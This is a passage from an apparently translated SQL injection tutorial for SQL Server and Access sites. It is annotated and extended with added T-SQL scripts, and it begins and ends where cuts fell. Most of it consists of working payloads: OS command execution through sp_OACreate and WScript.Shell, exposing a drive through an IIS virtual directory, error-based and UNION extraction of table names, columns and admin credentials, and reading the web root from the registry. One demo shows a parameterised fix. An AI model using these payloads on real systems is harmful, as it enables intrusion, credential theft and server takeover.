Common SQL injection statements explained (2) bitsCN.com
-W "default Web site" -V "e","e:\"'--
(tail of the virtual-directory creation command: -W names the web site, -V creates a virtual directory named e that maps to E:\, so the whole drive becomes reachable through the site)
Access permissions (used together with writing a webshell):
declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'
chaccess.vbs -a takes the metabase path of the new virtual directory and +browse turns on directory browsing for it, so the files mapped from E:\ can be listed and fetched through the web server. Both OLE automation procedures need sysadmin rights; on SQL Server 2005 and later the 'Ole Automation Procedures' option is off by default and has to be enabled with sp_configure first.
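Added example, not code from the original page: the sp_oacreate payload above fires cscript through 'run' and gets nothing back. The script below uses the same OLE automation procedures but calls the Exec method of WScript.Shell and reads the process's StdOut into a variable, checks the HRESULT of every step, and starts by looking at whether the option is enabled at all. It assumes SQL Server 2005 or later and a sysadmin login; the command line is an assumption chosen for the demo.

```sql
-- Added example, not code from the original page. Assumes SQL Server 2005 or later
-- and a sysadmin login. The command line is an assumption made for this demo.
SET NOCOUNT ON;
DECLARE @hr int, @shell int, @proc int, @stdout int;
DECLARE @cmd varchar(500), @output varchar(8000), @src varchar(255), @desc varchar(255);

-- precondition: value_in_use = 0 means every sp_OA* call below fails with the
-- "SQL Server blocked access to procedure" error before @hr is even set
SELECT name, value_in_use FROM sys.configurations WHERE name = 'Ole Automation Procedures';

SET @cmd = 'cmd.exe /c whoami & hostname';

EXEC @hr = sp_OACreate 'WScript.Shell', @shell OUTPUT;
IF @hr <> 0 GOTO fail;

-- Exec (unlike Run, which the page uses) returns a WshScriptExec object whose StdOut can be read
EXEC @hr = sp_OAMethod @shell, 'Exec', @proc OUTPUT, @cmd;
IF @hr <> 0 GOTO fail;

-- StdOut is a TextStream object; ReadAll blocks until the process closes it
EXEC @hr = sp_OAGetProperty @proc, 'StdOut', @stdout OUTPUT;
IF @hr <> 0 GOTO fail;

EXEC @hr = sp_OAMethod @stdout, 'ReadAll', @output OUTPUT;   -- truncated to 8000 chars
IF @hr <> 0 GOTO fail;

SELECT @output AS command_output;
GOTO cleanup;

fail:
    -- NULL object token is allowed here and returns the last error of the batch
    EXEC sp_OAGetErrorInfo @shell, @src OUTPUT, @desc OUTPUT;
    SELECT @hr AS hresult, @src AS source, @desc AS description;

cleanup:
    IF @stdout IS NOT NULL EXEC sp_OADestroy @stdout;
    IF @proc IS NOT NULL EXEC sp_OADestroy @proc;
    IF @shell IS NOT NULL EXEC sp_OADestroy @shell;
```

Once the output sits in a variable it can be written to a table like the newtable/swap tables later on this page and pulled out one row at a time with the and 0<>(select top 1 ...) form, so no xp_cmdshell is needed to see what a command printed.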
Special trick for forcing the database path to leak: %5c is the URL-encoded '\'. Replace the last '/' before the script name in the URL with %5c and submit; an ASP site that builds the path to its Access .mdb relative to the script then fails to open it, and the error message shows the full path.
How do I obtain the names of all tables in a SQL Server database?
--------------------------------------------------------------------------------
User tables:
select name from sysobjects where xtype='U'
System tables:
select name from sysobjects where xtype='S'
All tables:
select name from sysobjects where xtype='S' or xtype='U'
On SQL Server 2005 and later sysobjects is only a compatibility view over sys.objects (sys.tables is the supported view), but the queries above still work there.
--------------------------------------------------------------------------------
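As an added example that is not part of the original page, the following T-SQL script walks the user tables of the current database one at a time with the same top 1 ... name not in (...) pattern the payloads below use by hand, and then lists each table's columns from syscolumns by object id. It assumes SQL Server 2005 or later, where sysobjects, syscolumns and systypes survive as compatibility views, and creates a throwaway table dbo.inj_demo_admin (an assumed name) so the walk has something to find.

```sql
-- Added example, not code from the original page. Assumes SQL Server 2005 or later.
-- dbo.inj_demo_admin is a throwaway table created so the walk has something to find.
SET NOCOUNT ON;

IF OBJECT_ID('dbo.inj_demo_admin', 'U') IS NULL
    CREATE TABLE dbo.inj_demo_admin (user_id int IDENTITY(1,1), username varchar(50), [password] varchar(50));

-- names already pulled; this is the growing not in ('admin', ...) list of the manual payloads
DECLARE @seen TABLE (name sysname);
DECLARE @tbl sysname, @id int;

-- one table per round, exactly like "select top 1 name from sysobjects where xtype='u' and name not in (...)"
SELECT TOP 1 @tbl = name FROM sysobjects
WHERE xtype = 'U' AND name NOT IN (SELECT name FROM @seen) ORDER BY name;

WHILE @tbl IS NOT NULL
BEGIN
    INSERT INTO @seen VALUES (@tbl);

    -- the object id the manual payloads extract through the conversion error on str(id)
    SELECT @id = id FROM sysobjects WHERE xtype = 'U' AND name = @tbl;

    -- the columns of that id; the manual walk pulls these one per request with "name not in (...)"
    SELECT @tbl AS table_name, @id AS object_id, c.colid, c.name AS column_name,
           t.name AS type_name, c.length
    FROM syscolumns c
    JOIN systypes t ON t.xusertype = c.xusertype
    WHERE c.id = @id
    ORDER BY c.colid;

    SET @tbl = NULL;    -- TOP 1 into a variable leaves it untouched when nothing matches
    SELECT TOP 1 @tbl = name FROM sysobjects
    WHERE xtype = 'U' AND name NOT IN (SELECT name FROM @seen) ORDER BY name;
END;

DROP TABLE dbo.inj_demo_admin;
```

Run it in the database the injection lands in; each round of the loop is one request in the manual procedure, and the column result sets are what the syscolumns payloads below reconstruct one name at a time.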
and 0<>(select top 1 paths from newtable)--    (reads back the web path stored in newtable; the statements that fill it are at the end of this page)
Obtain the database name (dbid 1 to 5 are normally taken by the system and sample databases, so user databases can be told apart from 6 upwards):
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid=7, 8, 9 ... to get the remaining database names. In both forms a string column is compared with an integer; SQL Server fails to convert the string and prints it inside the error message, which is the channel every payload in this section relies on.
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u')    brute-forces the first table, for example admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u' and name not in ('admin'))    gets the next table; keep adding every name found to the not in list until nothing comes back
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='u' and name='admin' and uid>(str(id)))    forces the object id of admin into the error text; assume the value shown is 18779569 (uid is only the left side of the comparison, the number that leaks is id)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)    gets one column of admin, assume it is user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id',...))    exposes the remaining columns
and 0<(select user_id from bbs.dbo.admin where username>1)    gets the user name
The password is obtained the same way. This assumes the admin table has columns such as user_id, username and password.
The same sequence condensed, with a second set of sample values:
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u')
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u' and name not in ('address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='u' and name='admin' and uid>(str(id)))    determines the id value
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=773577794)    all columns, one per request
?id=-1 union select 1,2,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,4,5,6,7,8,*,9,10,11,12,13 from admin
(The number of literals plus the column count of admin must equal the column count of the original query, and * can sit at any position where the types line up; id=-1 keeps the original query from returning rows. UNION works against Access as well.)
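Added example, not code from the original page, showing why the payloads above behave as they do: both the error-based and 0<>(select ...) / name>1 family and the union select 1,...,* width probe. The vulnerable query, the tables dbo.inj_demo_news and dbo.inj_demo_admin and their rows are constructed for this demo, and it assumes SQL Server 2008 or later (TRY/CATCH around sp_executesql, multi-row VALUES). The numeric-id payload uses an 'id:' + str(id) prefix instead of the page's uid>(str(id)) form, because a purely numeric string converts to int without raising an error.

```sql
-- Added example, not code from the original page. Constructed demo tables and a deliberately
-- vulnerable query string stand in for the bbs site the page attacks. Assumes SQL Server 2008+.
SET NOCOUNT ON;

-- constructed demo data: the site's own table and the admin table the attacker is after
IF OBJECT_ID('dbo.inj_demo_news', 'U') IS NOT NULL DROP TABLE dbo.inj_demo_news;
IF OBJECT_ID('dbo.inj_demo_admin', 'U') IS NOT NULL DROP TABLE dbo.inj_demo_admin;
CREATE TABLE dbo.inj_demo_news (id int, title varchar(100), body varchar(100), author varchar(50));
CREATE TABLE dbo.inj_demo_admin (user_id int, username varchar(50), [password] varchar(50));
INSERT INTO dbo.inj_demo_news VALUES (1, 'hello', 'first post', 'editor');
INSERT INTO dbo.inj_demo_admin VALUES (1, 'webmaster', 'P@ssw0rd');

-- the payloads, in the shape the page uses (quotes doubled because they sit inside a literal)
DECLARE @payloads TABLE (n int IDENTITY(1,1), p varchar(400));
INSERT INTO @payloads (p) VALUES
  -- 1=(select name ...): the database name is compared with an int and lands in the error text
  ('1 and 1=(select name from master.dbo.sysdatabases where dbid=1)--'),
  -- 0<>(select top 1 name ... not in (...)): the first user table not seen yet
  ('1 and 0<>(select top 1 name from sysobjects where xtype=''U'' and name not in (''inj_demo_news'') order by name)--'),
  -- a bare numeric id converts to int cleanly, so prefix it to force the error
  ('1 and 0<>(select ''id:'' + str(id) from sysobjects where xtype=''U'' and name=''inj_demo_admin'')--'),
  -- username>1: the user name is compared with an int
  ('1 and 0<(select top 1 user_id from dbo.inj_demo_admin where username>1)--'),
  -- union width probe: news has 4 columns, so 1 literal + admin's 3 columns fits ...
  ('-1 union select 1,* from dbo.inj_demo_admin--'),
  -- ... and 2 literals + 3 columns does not
  ('-1 union select 1,2,* from dbo.inj_demo_admin--');

DECLARE @n int, @p varchar(400), @sql nvarchar(max);
SET @n = 1;
WHILE @n <= (SELECT MAX(n) FROM @payloads)
BEGIN
    SELECT @p = p FROM @payloads WHERE n = @n;
    -- the vulnerable pattern: the id parameter concatenated straight into the query text
    SET @sql = N'select id, title, body, author from dbo.inj_demo_news where id=' + @p;
    PRINT 'payload ' + CAST(@n AS varchar(10)) + ': ' + @p;
    BEGIN TRY
        EXEC sp_executesql @sql;        -- payload 5 returns the admin row as a result set here
        PRINT '  no error';
    END TRY
    BEGIN CATCH
        -- 245 = conversion failed (the leaked value is quoted inside the message)
        -- 205 = unequal number of expressions in the UNION target lists
        PRINT '  error ' + CAST(ERROR_NUMBER() AS varchar(10)) + ': ' + ERROR_MESSAGE();
    END CATCH;
    SET @n = @n + 1;
END;

-- the fix: the same query with id passed as a typed parameter, so none of the payloads parse as SQL
-- EXEC sp_executesql N'select id, title, body, author from dbo.inj_demo_news where id=@id', N'@id int', @id = 1;

DROP TABLE dbo.inj_demo_news;
DROP TABLE dbo.inj_demo_admin;
```

The UNION errors are raised while the inner batch is compiled, which is why the script runs each payload through sp_executesql: a compile error in the same batch as the TRY block would not be caught. Payload 5 works only because the admin columns that land on title, body and author are of types that convert cleanly; with a datetime or int column in those positions the row itself would trip the conversion error, which is the reason the page shuffles where * goes.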
Obtain the WEB path
;create table [dbo].[swap] ([swappass] [char](255));--
and (select top 1 swappass from swap)=1--    (reads back whatever was stored in swap through the same conversion error)
;create table newtable(id int identity(1,1), paths varchar(500)) declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', @value=@test OUTPUT insert into p
xp_regread needs sysadmin rights (or an explicit grant), and @test should be declared as wide as the paths column, since varchar(20) is shorter than most site roots. The Virtual Roots key is where IIS 4 and 5 keep their virtual directory mappings, with the value named '/' holding the site root path followed by its access settings; IIS 6 and later keep this in the metabase, so the key is absent there.